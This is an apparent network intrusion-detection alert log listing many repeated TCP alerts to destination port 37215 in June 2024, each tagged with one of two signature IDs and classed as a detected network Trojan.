              Timestamp:06/13/24-21:33:09.086875
              SID:2829579
              Source Port:38454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613981
              SID:2829579
              Source Port:60092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164575
              SID:2829579
              Source Port:55536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169333
              SID:2829579
              Source Port:53242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357379
              SID:2829579
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087928
              SID:2829579
              Source Port:53610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635878
              SID:2829579
              Source Port:41240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786256
              SID:2829579
              Source Port:44142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355960
              SID:2835222
              Source Port:52006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170805
              SID:2829579
              Source Port:57126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996831
              SID:2835222
              Source Port:55678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710174
              SID:2835222
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656947
              SID:2835222
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154207
              SID:2835222
              Source Port:51796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455288
              SID:2829579
              Source Port:36678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298047
              SID:2829579
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571656
              SID:2835222
              Source Port:37746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156257
              SID:2829579
              Source Port:42666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729942
              SID:2829579
              Source Port:34026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784220
              SID:2835222
              Source Port:46996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507269
              SID:2829579
              Source Port:42506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992609
              SID:2829579
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159211
              SID:2835222
              Source Port:56870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696947
              SID:2835222
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565829
              SID:2835222
              Source Port:50590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724545
              SID:2829579
              Source Port:58170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100531
              SID:2835222
              Source Port:57172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214629
              SID:2835222
              Source Port:41914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451807
              SID:2835222
              Source Port:34352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568305
              SID:2829579
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568397
              SID:2835222
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109270
              SID:2829579
              Source Port:53970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276570
              SID:2835222
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780663
              SID:2835222
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155509
              SID:2829579
              Source Port:54870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417514
              SID:2835222
              Source Port:36126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403481
              SID:2835222
              Source Port:41924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259439
              SID:2835222
              Source Port:44182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172859
              SID:2829579
              Source Port:43220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307117
              SID:2835222
              Source Port:60768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377414
              SID:2835222
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565908
              SID:2835222
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805827
              SID:2829579
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503962
              SID:2835222
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424210
              SID:2835222
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016590
              SID:2829579
              Source Port:35830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276820
              SID:2829579
              Source Port:52000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416554
              SID:2835222
              Source Port:48208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725865
              SID:2835222
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200246
              SID:2829579
              Source Port:39870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224689
              SID:2829579
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954228
              SID:2829579
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711923
              SID:2835222
              Source Port:34124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456095
              SID:2835222
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153391
              SID:2829579
              Source Port:53736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707374
              SID:2835222
              Source Port:38840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222794
              SID:2835222
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505564
              SID:2835222
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572116
              SID:2829579
              Source Port:40876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758425
              SID:2829579
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711900
              SID:2829579
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678074
              SID:2829579
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456736
              SID:2829579
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418094
              SID:2835222
              Source Port:51832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978121
              SID:2835222
              Source Port:47302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109748
              SID:2835222
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976307
              SID:2829579
              Source Port:49432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045343
              SID:2835222
              Source Port:44600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757151
              SID:2829579
              Source Port:40838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991463
              SID:2835222
              Source Port:37814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658647
              SID:2835222
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160861
              SID:2835222
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611605
              SID:2835222
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823811
              SID:2829579
              Source Port:42470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930929
              SID:2829579
              Source Port:33548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953747
              SID:2829579
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246931
              SID:2835222
              Source Port:47012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453592
              SID:2829579
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248788
              SID:2829579
              Source Port:44000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320154
              SID:2835222
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914813
              SID:2829579
              Source Port:49462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130149
              SID:2829579
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014150
              SID:2829579
              Source Port:55466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610531
              SID:2829579
              Source Port:49878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044467
              SID:2829579
              Source Port:48854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170676
              SID:2829579
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228040
              SID:2829579
              Source Port:44976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550267
              SID:2835222
              Source Port:37618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128093
              SID:2829579
              Source Port:39476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155295
              SID:2829579
              Source Port:46710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455634
              SID:2835222
              Source Port:58256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872742
              SID:2829579
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913733
              SID:2835222
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039990
              SID:2835222
              Source Port:34778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276871
              SID:2835222
              Source Port:52458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510087
              SID:2829579
              Source Port:44180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129082
              SID:2835222
              Source Port:34868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237950
              SID:2829579
              Source Port:38824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780972
              SID:2829579
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224805
              SID:2829579
              Source Port:35198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678717
              SID:2829579
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060196
              SID:2829579
              Source Port:60424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613753
              SID:2835222
              Source Port:58214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223443
              SID:2835222
              Source Port:41106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543849
              SID:2829579
              Source Port:39758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476113
              SID:2829579
              Source Port:54134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676180
              SID:2829579
              Source Port:33920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724425
              SID:2835222
              Source Port:42228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823206
              SID:2835222
              Source Port:35302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093478
              SID:2829579
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268333
              SID:2829579
              Source Port:60118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215754
              SID:2835222
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108238
              SID:2829579
              Source Port:45776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934836
              SID:2829579
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026904
              SID:2829579
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181544
              SID:2829579
              Source Port:57358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487561
              SID:2835222
              Source Port:48162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755264
              SID:2829579
              Source Port:40232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157979
              SID:2835222
              Source Port:52970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731393
              SID:2829579
              Source Port:36542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215473
              SID:2835222
              Source Port:40034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725837
              SID:2835222
              Source Port:57094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300534
              SID:2835222
              Source Port:58172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378543
              SID:2835222
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297111
              SID:2829579
              Source Port:34698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523492
              SID:2829579
              Source Port:47640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659946
              SID:2835222
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231044
              SID:2829579
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417949
              SID:2829579
              Source Port:34294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107237
              SID:2829579
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129476
              SID:2829579
              Source Port:42822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545282
              SID:2835222
              Source Port:44630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822050
              SID:2835222
              Source Port:44726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612988
              SID:2835222
              Source Port:46072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401404
              SID:2835222
              Source Port:50116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242877
              SID:2829579
              Source Port:44354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224765
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671063
              SID:2835222
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418268
              SID:2829579
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107755
              SID:2835222
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075168
              SID:2835222
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264796
              SID:2835222
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416285
              SID:2835222
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132688
              SID:2829579
              Source Port:36594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724372
              SID:2829579
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027262
              SID:2835222
              Source Port:51370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804451
              SID:2835222
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013175
              SID:2829579
              Source Port:38002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758459
              SID:2829579
              Source Port:50982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244749
              SID:2829579
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870849
              SID:2835222
              Source Port:49060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843891
              SID:2829579
              Source Port:41920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248367
              SID:2829579
              Source Port:34650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570326
              SID:2835222
              Source Port:48726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159784
              SID:2829579
              Source Port:33596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024315
              SID:2835222
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567897
              SID:2835222
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994539
              SID:2835222
              Source Port:42658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191764
              SID:2835222
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868962
              SID:2835222
              Source Port:50328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167932
              SID:2835222
              Source Port:37372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041452
              SID:2829579
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094417
              SID:2835222
              Source Port:39710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166742
              SID:2829579
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159254
              SID:2835222
              Source Port:43198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109919
              SID:2835222
              Source Port:57328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824131
              SID:2829579
              Source Port:48980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255835
              SID:2835222
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454640
              SID:2829579
              Source Port:34528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630660
              SID:2835222
              Source Port:50878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680005
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914086
              SID:2829579
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213284
              SID:2829579
              Source Port:49550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317426
              SID:2835222
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670571
              SID:2829579
              Source Port:44422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842646
              SID:2829579
              Source Port:56418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677745
              SID:2835222
              Source Port:45800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837279
              SID:2829579
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822647
              SID:2835222
              Source Port:40730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456690
              SID:2835222
              Source Port:33718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869044
              SID:2829579
              Source Port:45202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211122
              SID:2835222
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415623
              SID:2835222
              Source Port:52320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044672
              SID:2835222
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130875
              SID:2829579
              Source Port:59052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406939
              SID:2835222
              Source Port:48700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938065
              SID:2835222
              Source Port:36056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306060
              SID:2829579
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091397
              SID:2835222
              Source Port:34040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279362
              SID:2835222
              Source Port:44048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783524
              SID:2835222
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153061
              SID:2829579
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655635
              SID:2829579
              Source Port:36156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452970
              SID:2835222
              Source Port:32892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239875
              SID:2835222
              Source Port:37848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278337
              SID:2835222
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088615
              SID:2835222
              Source Port:45016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931113
